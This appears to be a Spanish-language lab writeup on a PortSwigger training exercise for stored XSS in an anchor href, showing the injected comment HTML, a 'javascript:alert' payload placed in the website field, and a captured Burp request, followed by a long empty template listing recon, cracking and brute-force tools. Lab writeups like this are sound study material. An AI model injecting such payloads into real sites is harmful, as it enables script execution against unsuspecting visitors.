👨‍🏫WRITEUP RESUMEN

👁️ RECONOCIMIENTO PASIVO ✔️

AUDITORIA DE: ((Laboratorio: XSS almacenado en hrefun atributo de anclaje con comillas dobles codificadas en HTML))

RECONOCIMIENTO PASIVO

BROWSER👈 --------------------------------->https://www.paimon.com.ar/

HTML INYECTABLE:



<div>
                    <hr>
                    <h1>Comments</h1>
                    <section class="comment">
                        <p>
                        <img src="/resources/images/avatarDefault.svg" class="avatar">                            Lee Onmee | 13 February 2024
                        </p>
                        <p>I feel a great debate coming on. My husband's just got home and the window cleaner is still in our bed.</p>
                        <p></p>
                    </section>
                    <section class="comment">
                        <p>
                        <img src="/resources/images/avatarDefault.svg" class="avatar">                            Zach Ache | 24 February 2024
                        </p>
                        <p>Can I get these as an audio file? I grow weary of having to read things.</p>
                        <p></p>
                    </section>
                    <section class="comment">
                        <p>
                        <img src="/resources/images/avatarDefault.svg" class="avatar">                            Paul Amuscle | 24 February 2024
                        </p>
                        <p>Amusing, enticing and well put together. But enough from my dating profile, good blog</p>
                        <p></p>
                    </section>
                    <section class="comment">
                        <p>
                        <img src="/resources/images/avatarDefault.svg" class="avatar">                            Mike Groin | 01 March 2024
                        </p>
                        <p>I keep telling my husband how good your blogs are and how much he's enjoy reading them. Which is really cruel as he's blind.</p>
                        <p></p>
                    </section>
                    <section class="comment">
                        <p>
                        <img src="/resources/images/avatarDefault.svg" class="avatar">                            <a id="author" href="javascript:alert('P4IM0N-XSS')">PAIMON</a> | 09 March 2024
                        </p>
                        <p>TE VOY A HACKEAR</p>
                        <p></p>
                    </section>
                    <hr>
                    <section class="add-comment">
                        <h2>Leave a comment</h2>
                        <form action="/post/comment" method="POST" enctype="application/x-www-form-urlencoded">
                            <input required="" type="hidden" name="csrf" value="TtYe4Ro8UiaCbKgwHAzjwVzXRFqMKVOd">
                            <input required="" type="hidden" name="postId" value="3">
                            <label>Comment:</label>
                            <textarea required="" rows="12" cols="300" name="comment"></textarea>
                                    <label>Name:</label>
                                    <input required="" type="text" name="name">
                                    <label>Email:</label>
                                    <input required="" type="email" name="email">
                                    <label>Website:</label>
                                    <input type="text" name="website">
                            <button class="button" type="submit">Post Comment</button>
                        </form>
                    </section>
                    <div class="is-linkback">
                        <a href="/">Back to Blog</a>
                    </div>
                </div>

CONCLUSION: CONSTATAMOS QUE EL HREF DEL NOMBRE DEL USUARIO QUE COMENTA ESTA DENTRO DE UINA ETIQUETA A , Y DENTRO DEL DICHO HREF SIMPLEMETE VEMOS QUE SE CARGABA EL PARAMETRO WEB SITE QUE INGRESABA EL SUSARIO Y VIMOS ESTA PUERTA DE ENTRADA PARA CARGAR NUESTRO PAYLOAD DIRECTAMENTE CON COMILLAS SIMPLES Y LOGARA LA INYECCION DEL XSS ALMACENADO SE TENZO.

🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫

🔬 ANALISIS FORENSE ❌

ANALISIS FORENSE

AUTOPSY👈 https://tools.kali.org/forensics/autopsy--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
AUTOPSY👈 https://tools.kali.org/forensics/autopsy--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
AUTOPSY👈 https://tools.kali.org/forensics/autopsy--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
VOLATILITY👈 https://github.com/volatilityfoundation/volatility--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
VOLATILITY👈 https://github.com/volatilityfoundation/volatility--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
VOLATILITY👈 https://github.com/volatilityfoundation/volatility--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FTK👈 https://www.accessdata.com/products-services/forensic-toolkit-ftk--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FTK👈 https://www.accessdata.com/products-services/forensic-toolkit-ftk--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FTK👈 https://www.accessdata.com/products-services/forensic-toolkit-ftk--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
DFF👈 (Digital Forensics Framework) https://github.com/arxsys/dff
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TSK👈 (The Sleuth Kit) https://tools.kali.org/forensics/sleuthkit
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
X-WAYS Forensics👈 https://www.x-ways.net/forensics/index-m.html
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FOREMOST👈 https://github.com/korczis/foremost
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HxD👈 https://mh-nexus.de/en/hxd/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HxD👈 https://mh-nexus.de/en/hxd/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WIRESHARK👈 --------------------------------->https://github.com/wireshark/wireshark --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WIRESHARK👈 --------------------------------->https://github.com/wireshark/wireshark --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WIRESHARK👈 --------------------------------->https://github.com/wireshark/wireshark --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TSHARK👈 --------------------------------->https://www.kali.org/tools/wireshark/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TSHARK👈 --------------------------------->https://www.kali.org/tools/wireshark/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TSHARK👈 --------------------------------->https://www.kali.org/tools/wireshark/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
XXD👈 https://tools.kali.org/forensics/xxd
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
XXD👈 https://tools.kali.org/forensics/xxd
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
XXD👈 https://tools.kali.org/forensics/xxd
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦

👊 RECONOCIMIENTO ACTIVO ❌

RECONOCIMIENTO ACTIVO

PING👈 --------------------------------->https://www.kali.org/tools/fping/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NMAP👈 --------------------------------->https://nmap.org/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NMAP👈 --------------------------------->https://nmap.org/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NMAP👈 --------------------------------->https://nmap.org/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NESSUS👈 --------------------------------->https://es-la.tenable.com/products/nessus/nessus-essentials
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
OPENVAS👈 --------------------------------->https://github.com/greenbone/openvas-scanner
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NIKTO👈 --------------------------------->https://github.com/sullo/nikto
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BURP SUITE👈 --------------------------------->https://portswigger.net/web-security --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BURP SUITE👈 --------------------------------->https://portswigger.net/web-security --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BURP SUITE👈 --------------------------------->https://portswigger.net/web-security --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
OWASP ZAP👈 --------------------------------->https://github.com/zaproxy/zaproxy
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WIRESHARK👈 --------------------------------->https://github.com/wireshark/wireshark --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WIRESHARK👈 --------------------------------->https://github.com/wireshark/wireshark --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
DIRBUSTER👈 --------------------------------->https://github.com/KajanM/DirBuster
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
DIRBUSTER👈 --------------------------------->https://github.com/KajanM/DirBuster
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SQLMAP👈 --------------------------------->https://github.com/sqlmapproject/sqlmap --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SQLMAP👈 --------------------------------->https://github.com/sqlmapproject/sqlmap --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WPSCAN👈 --------------------------------->https://wpscan.com/register/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
JOOMSCAN👈 --------------------------------->https://www.kali.org/tools/joomscan/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GOBUSTER👈 --------------------------------->https://www.kali.org/tools/gobuster/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GOBUSTER👈 --------------------------------->https://www.kali.org/tools/gobuster/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FFUF👈 --------------------------------->https://www.kali.org/tools/ffuf/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FFUF👈 --------------------------------->https://www.kali.org/tools/ffuf/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TRACEROUTE👈 --------------------------------->https://www.kali.org/tools/traceroute/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SMBCLIENT👈 --------------------------------->https://www.kali.org/tools/samba/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SMBCLIENT👈 --------------------------------->https://www.kali.org/tools/samba/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SMBCLIENT👈 --------------------------------->https://www.kali.org/tools/samba/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TELNET👈 --------------------------------->https://wowgold-seller.com/es/stories/133-how-to-install-and-use-telnet-on-kali-linux
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TELNET👈 --------------------------------->https://wowgold-seller.com/es/stories/133-how-to-install-and-use-telnet-on-kali-linux
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TELNET👈 --------------------------------->https://wowgold-seller.com/es/stories/133-how-to-install-and-use-telnet-on-kali-linux
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SSH👈 --------------------------------->https://www.kali.org/tools/openssh/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SSH👈 --------------------------------->https://www.kali.org/tools/openssh/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FTP👈 --------------------------------->https://www.kali.org/tools/netkit-ftp/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FTP👈 --------------------------------->https://www.kali.org/tools/netkit-ftp/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FTP👈 --------------------------------->https://www.kali.org/tools/netkit-ftp/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TCPDUMP👈 --------------------------------->https://www.kali.org/tools/tcpdump/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TCPDUMP👈 --------------------------------->https://www.kali.org/tools/tcpdump/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TCPDUMP👈 --------------------------------->https://www.kali.org/tools/tcpdump/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TSHARK👈 --------------------------------->https://www.kali.org/tools/wireshark/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TSHARK👈 --------------------------------->https://www.kali.org/tools/wireshark/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TSHARK👈 --------------------------------->https://www.kali.org/tools/wireshark/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BETTERCAP👈 --------------------------------->https://www.kali.org/tools/bettercap/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SMBMAP👈 --------------------------------->https://www.kali.org/tools/smbmap/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SMBMAP👈 --------------------------------->https://www.kali.org/tools/smbmap/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WFUZZ👈 --------------------------------->https://www.kali.org/tools/wfuzz/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WFUZZ👈 --------------------------------->https://www.kali.org/tools/wfuzz/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BETTERCAP👈 --------------------------------->https://www.kali.org/tools/bettercap/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMMIX👈 --------------------------------->https://www.kali.org/tools/commix/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMMIX👈 --------------------------------->https://www.kali.org/tools/commix/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SKIP-FISH👈 --------------------------------->https://www.kali.org/tools/skipfish/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WAPITI👈 --------------------------------->https://www.kali.org/tools/wapiti/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
ETTERCAP👈 --------------------------------->https://www.kali.org/tools/ettercap/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WIFITE👈 --------------------------------->https://www.kali.org/tools/wifite/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SPOOFTOOPH👈 --------------------------------->https://www.kali.org/tools/spooftooph/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CRACKMAPEXEC👈 --------------------------------->https://www.kali.org/tools/crackmapexec/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪

🕵️ INVESTIGACION OSINT ❌

INVESTIGACION OSINT

OSINT Framework👈 --------------------------------->https://osintframework.com/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
Maltego👈 --------------------------------->https://www.kali.org/tools/maltego/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
Maltego👈 --------------------------------->https://www.kali.org/tools/maltego/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
Recon-ng👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
Recon-ng👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
theHarvester👈 --------------------------------->https://www.kali.org/tools/theharvester/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
theHarvester👈 --------------------------------->https://www.kali.org/tools/theharvester/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GOOGLE DORKS👈 --------------------------------->https://www.google.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GOOGLE DORKS👈 --------------------------------->https://www.google.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GOOGLE DORKS👈 --------------------------------->https://www.google.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SHODAN👈 --------------------------------->https://www.shodan.io/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
OSRFrameworK👈 --------------------------------->https://www.kali.org/tools/osrframework/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SN0INT👈 --------------------------------->https://www.kali.org/tools/sn0int/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
OSINTGRAM👈 --------------------------------->https://github.com/Datalux/Osintgram
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TWOSINT👈 --------------------------------->https://github.com/falkensmz/tw1tter0s1nt
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X FACEBOOK👈 --------------------------------->https://intelx.io/tools?tab=facebook
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X PERSONAS👈 --------------------------------->https://intelx.io/tools?tab=person
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X TELEFONOS👈 --------------------------------->https://intelx.io/tools?tab=telephone
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X Ubicación 2 Mapa👈 --------------------------------->https://intelx.io/tools?tab=location
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X IMAGEN👈 --------------------------------->https://intelx.io/tools?tab=image
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X NOMBRE DE USUARIO👈 --------------------------------->https://intelx.io/tools?tab=username
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X HASH INVERSA👈 --------------------------------->https://intelx.io/tools?tab=hash
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X ARCHIVOS👈 --------------------------------->https://intelx.io/tools?tab=file
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X VIN VEHICULOS👈 --------------------------------->https://intelx.io/tools?tab=vin
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩

⛓️ HASHES Y DESENCRIPTADOS ❌

HASHES Y DESENCRIPTADOS

JOHN THE RIPPER👈 --------------------------------->https://www.kali.org/tools/john/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
JOHN THE RIPPER👈 --------------------------------->https://www.kali.org/tools/john/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
JOHN THE RIPPER👈 --------------------------------->https://www.kali.org/tools/john/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HASHCAT👈 --------------------------------->https://www.kali.org/tools/hashcat/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
RAINBOWCRACK👈 --------------------------------->https://www.kali.org/tools/rainbowcrack/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
OPHCRACK👈 --------------------------------->https://www.kali.org/tools/ophcrack/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CRACKSTATION👈 --------------------------------->https://crackstation.net/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
AIRCRACK-NG👈 --------------------------------->https://www.kali.org/tools/aircrack-ng/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
AIRCRACK-NG👈 --------------------------------->https://www.kali.org/tools/aircrack-ng/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CAIN Y ABEL👈 --------------------------------->https://github.com/xchwarze/Cain
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HYDRA👈 --------------------------------->https://www.kali.org/tools/hydra/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HYDRA👈 --------------------------------->https://www.kali.org/tools/hydra/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HYDRA👈 --------------------------------->https://www.kali.org/tools/hydra/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
MEDUSA👈 --------------------------------->https://www.kali.org/tools/medusa/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
MEDUSA👈 --------------------------------->https://www.kali.org/tools/medusa/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
DAVEGRO1👈 --------------------------------->https://github.com/octomagon/davegrohl
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
ElcomSoft Distributed Password Recovery👈 --------------------------------->https://www.elcomsoft.es/edpr.html
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CRACK RAR👈 --------------------------------->https://github.com/TermuxHackz/Crack-rar
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CRACK NINJA RAR👈 --------------------------------->https://github.com/SHUR1K-N/RARNinja-RAR-Password-Cracking-Utility
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NCRACK👈 --------------------------------->https://www.kali.org/tools/ncrack/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CEWL WORDLIST👈 --------------------------------->https://www.kali.org/tools/cewl/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CRUNCH WORDLIST👈 --------------------------------->https://www.kali.org/tools/crunch/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
P4Iwordlists👈 --------------------------------->https://paimonhacking.gitbook.io/p4im0n_h4cking/curso-hacking-con-python/generador-de-wordlist-para-fuerza-bruta-p4iwordlist.py-1.2v
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CYBERCHEF👈 --------------------------------->https://gchq.github.io/CyberChef/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CYBERCHEF👈 --------------------------------->https://gchq.github.io/CyberChef/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CYBERCHEF👈 --------------------------------->https://gchq.github.io/CyberChef/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BASE64 DECODE👈 --------------------------------->https://www.base64decode.org/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BASE64 DECODE👈 --------------------------------->https://www.base64decode.org/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨

💪 FUERZA BRUTA A LOGINS ❌

FUERZA BRUTA A LOGINS

HYDRA👈 --------------------------------->https://www.kali.org/tools/hydra/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HYDRA👈 --------------------------------->https://www.kali.org/tools/hydra/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HYDRA👈 --------------------------------->https://www.kali.org/tools/hydra/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
MEDUSA👈 --------------------------------->https://www.kali.org/tools/medusa/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
MEDUSA👈 --------------------------------->https://www.kali.org/tools/medusa/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
MEDUSA👈 --------------------------------->https://www.kali.org/tools/medusa/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NCRACK👈 --------------------------------->https://www.kali.org/tools/ncrack/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
161 ONESIXTYONE👈 --------------------------------->https://www.kali.org/tools/onesixtyone/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
THC-PPTP-BRUTER👈 --------------------------------->https://www.kali.org/tools/thc-pptp-bruter/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BURP SUITE👈 --------------------------------->https://portswigger.net/web-security --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BURP SUITE👈 --------------------------------->https://portswigger.net/web-security --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BURP SUITE👈 --------------------------------->https://portswigger.net/web-security --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CRACKMAPEXEC👈 --------------------------------->https://www.kali.org/tools/crackmapexec/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CROWBAR RDP👈 --------------------------------->https://www.kali.org/tools/crowbar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
THE CRACKER PDF,ZIP,RAR,LOGIN👈 --------------------------------->https://github.com/XDeadHackerX/The_Cracker
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
THC-HYDRA👈 --------------------------------->https://github.com/vanhauser-thc/thc-hydra
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
THC-HYDRA👈 --------------------------------->https://github.com/vanhauser-thc/thc-hydra
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
T14M4T scaneo de servicios en puertos y fuerza bruta automatizado👈 --------------------------------->https://github.com/MS-WEB-BN/t14m4t
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FACEBOOK-BRUTE-FORCE👈 --------------------------------->https://github.com/likhonsible/Facebook-Brute-Force
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧

🛠️ SCRIPT DE EXPLOIT Y PAYLOADS ✔️

SCRIPT DE EXPLOIT Y PAYLOADS

NOSOTROS 👈 --------------------------------->https://www.paimon.com.ar/
```
PROBANDO PAYLOADS Y FUNCIONO A LA PRIMERA:



javascript:alert('P4IM0N-XSS')
```
- CONCLUSION:FUNCIONO EL PAYLOAD A LA PRIMERA.

🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥

🤯 EXPLOTACION ✔️

EXPLOTACION

BURP SUITE👈 --------------------------------->https://portswigger.net/web-security --->PDF-TOOL

REQUEST NOMRAL:



POST /post/comment HTTP/2
Host: 0a18009404d9f89a83c33ccd00040081.web-security-academy.net
Cookie: session=wIYdf7PqerZCFYTDC3gD2AoGbBXyuRp0
Content-Length: 166
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="118", "Google Chrome";v="118", "Not=A?Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Origin: https://0a18009404d9f89a83c33ccd00040081.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a18009404d9f89a83c33ccd00040081.web-security-academy.net/post?postId=6
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Connection: close

csrf=2UG950bIoDRrvtRmAELfwdnkH9DxybNV&postId=6&comment=TE+VOY+A+HACKEAR&name=PAIMON&email=P4IM0N%40hotmail.com&website=http%3A%2F%2Fp4imon-d-m-python.herokuapp.com%2F




RESPONSE NORMAL:



HTTP/2 200 OK
Content-Type: text/html; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 5924

<!DOCTYPE html>
<html>
    <head>
        <link href=/resources/labheader/css/academyLabHeader.css rel=stylesheet>
        <link href=/resources/css/labsBlog.css rel=stylesheet>
        <title>Stored XSS into anchor href attribute with double quotes HTML-encoded</title>
    </head>
    <body>
        <script src="/resources/labheader/js/labHeader.js"></script>
        <div id="academyLabHeader">
            <section class='academyLabBanner is-solved'>
                <div class=container>
                    <div class=logo></div>
                        <div class=title-container>
